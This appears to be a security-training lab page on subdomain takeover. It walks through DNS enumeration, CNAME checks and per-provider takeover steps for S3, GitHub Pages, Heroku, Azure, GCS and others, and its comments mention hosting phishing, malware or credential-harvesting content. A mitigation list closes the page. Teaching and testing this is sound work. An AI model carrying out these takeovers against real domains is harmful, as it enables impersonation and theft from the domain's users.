Lab 1: Basic Subdomain Takeover

Basic subdomain takeover vulnerabilities

Difficulty: Low

Lab Overview

This lab demonstrates basic subdomain takeover vulnerabilities where attackers can take control of subdomains that are no longer in use but still point to external services.

Objective: Understand how basic subdomain takeover attacks work and how to exploit them.

Subdomain Takeover Scanner
Check Subdomain

This tool checks if a subdomain is vulnerable to takeover:

Takeover Tester
⚠️ Subdomain Takeover Warning

This lab demonstrates subdomain takeover vulnerabilities:

  • DNS Misconfiguration - Pointing to non-existent services
  • Service Deletion - Services deleted but DNS still points
  • Weak Authentication - Weak service authentication
  • No Validation - No subdomain validation
Test Subdomains

Try these test subdomains:

  • vulnerable.example.com - Vulnerable to takeover
  • secure.example.com - Properly secured
  • unknown.example.com - Unknown status
Basic Subdomain Takeover Techniques
DNS Enumeration
# Enumerate subdomains dig @8.8.8.8 example.com ANY nslookup subdomain.example.com host subdomain.example.com
CNAME Check
# Check CNAME records dig subdomain.example.com CNAME # Look for services like: # - *.s3.amazonaws.com # - *.herokuapp.com # - *.github.io
Service Verification
# Check if service exists curl -I https://subdomain.example.com # Look for 404 errors or # "NoSuchBucket" errors
Takeover Confirmation
# Confirm takeover # 1. Register service # 2. Point subdomain to service # 3. Verify control # 4. Host malicious content
Payload Delivery
# Host malicious content # - Phishing pages # - Malware distribution # - Credential harvesting # - XSS payloads
Impact Assessment
# Assess impact # - Brand reputation damage # - Credential theft # - Phishing attacks # - SEO manipulation
Vulnerability Details
  • Type: Basic Subdomain Takeover
  • Severity: Medium
  • Method: DNS misconfiguration
  • Issue: Service deletion without DNS cleanup
Attack Vectors
  • DNS Enumeration: Find vulnerable subdomains
  • CNAME Check: Check CNAME records
  • Service Verification: Verify service existence
  • Takeover Confirmation: Confirm takeover
Basic Subdomain Takeover Examples

Use these techniques to exploit basic subdomain takeover vulnerabilities:

1. DNS Enumeration:
# Enumerate subdomains dig @8.8.8.8 example.com ANY nslookup subdomain.example.com host subdomain.example.com # Use tools like: # - subfinder # - amass # - assetfinder # - findomain
2. CNAME Record Check:
# Check CNAME records dig subdomain.example.com CNAME # Look for vulnerable services: # - *.s3.amazonaws.com # - *.herokuapp.com # - *.github.io # - *.netlify.app # - *.vercel.app
3. Service Verification:
# Check if service exists curl -I https://subdomain.example.com curl -I http://subdomain.example.com # Look for: # - 404 errors # - "NoSuchBucket" errors # - "NoSuchKey" errors # - "Not Found" errors
4. AWS S3 Bucket Takeover:
# Check S3 bucket aws s3 ls s3://subdomain.example.com # If bucket doesn't exist: # 1. Create bucket with same name # 2. Upload malicious content # 3. Verify takeover # Example bucket creation: aws s3 mb s3://subdomain.example.com echo "Subdomain Takeover" > index.html aws s3 cp index.html s3://subdomain.example.com/
5. GitHub Pages Takeover:
# Check GitHub Pages curl -I https://subdomain.example.com # If 404 error: # 1. Create GitHub repository # 2. Enable GitHub Pages # 3. Upload malicious content # 4. Verify takeover # Repository setup: git init echo "Subdomain Takeover" > index.html git add . git commit -m "Initial commit" git push origin main
6. Heroku App Takeover:
# Check Heroku app curl -I https://subdomain.example.com # If 404 error: # 1. Create Heroku app # 2. Deploy malicious content # 3. Verify takeover # Heroku deployment: heroku create subdomain-example-com echo "Subdomain Takeover" > index.html git add . git commit -m "Initial commit" git push heroku main
7. Netlify Takeover:
# Check Netlify site curl -I https://subdomain.example.com # If 404 error: # 1. Create Netlify site # 2. Upload malicious content # 3. Verify takeover # Netlify deployment: netlify deploy --dir . --prod # Or drag and drop to Netlify dashboard
8. Vercel Takeover:
# Check Vercel site curl -I https://subdomain.example.com # If 404 error: # 1. Create Vercel project # 2. Deploy malicious content # 3. Verify takeover # Vercel deployment: vercel --prod # Or connect GitHub repository
9. Firebase Hosting Takeover:
# Check Firebase site curl -I https://subdomain.example.com # If 404 error: # 1. Create Firebase project # 2. Deploy malicious content # 3. Verify takeover # Firebase deployment: firebase init hosting firebase deploy
10. Azure Blob Storage Takeover:
# Check Azure blob curl -I https://subdomain.example.com # If 404 error: # 1. Create Azure storage account # 2. Create blob container # 3. Upload malicious content # 4. Verify takeover # Azure CLI: az storage account create --name subdomainexamplecom az storage container create --name $web az storage blob upload --file index.html --container-name $web
11. Google Cloud Storage Takeover:
# Check GCS bucket curl -I https://subdomain.example.com # If 404 error: # 1. Create GCS bucket # 2. Upload malicious content # 3. Verify takeover # GCS CLI: gsutil mb gs://subdomain.example.com gsutil cp index.html gs://subdomain.example.com/
12. Cloudflare Pages Takeover:
# Check Cloudflare Pages curl -I https://subdomain.example.com # If 404 error: # 1. Create Cloudflare Pages project # 2. Deploy malicious content # 3. Verify takeover # Cloudflare Pages deployment: # Upload files via dashboard or connect Git repository
13. Automated Takeover Detection:
# Use automated tools # - subjack # - takeover # - subzy # - subdomain-takeover # Example with subjack: subjack -w subdomains.txt -t 100 -o results.txt # Example with takeover: takeover -l subdomains.txt -t 10
14. Manual Verification:
# Manual verification steps # 1. Check DNS records # 2. Verify service existence # 3. Test for 404 errors # 4. Attempt service registration # 5. Confirm takeover # 6. Document findings
15. Impact Assessment:
# Assess takeover impact # - Brand reputation damage # - Credential theft potential # - Phishing attack vectors # - SEO manipulation # - Trust and security implications # Document findings: # - Vulnerable subdomains # - Affected services # - Potential impact # - Remediation steps
Real-World Attack Scenarios
Mitigation Strategies
  • Regular DNS record auditing and cleanup
  • Implement proper subdomain monitoring
  • Use secure service configurations
  • Implement proper authentication and authorization
  • Regular security testing and vulnerability assessments
  • Monitor for unusual subdomain activity
  • Implement proper DNS security controls
  • Use secure coding practices
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use subdomain takeover detection tools
  • Implement proper audit trails